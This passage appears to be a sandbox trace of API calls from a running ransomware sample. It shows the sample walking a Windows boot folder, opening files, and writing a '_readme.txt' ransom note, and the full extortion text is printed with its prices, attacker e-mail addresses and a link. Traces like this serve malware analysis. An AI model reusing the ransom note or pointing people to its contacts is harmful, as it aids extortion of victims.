wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.962] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.962] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.962] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.962] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.962] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.963] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.963] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.964] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.964] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.965] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.965] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.966] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.966] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.966] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.966] PathFindFileNameW (pszPath="") returned="" [0165.966] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.966] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.967] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.967] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.967] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.967] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.967] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0165.967] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.967] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.967] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.967] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.968] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.968] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.968] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0165.968] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0165.968] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.968] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.968] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.968] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.968] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.968] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.968] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.969] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.969] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 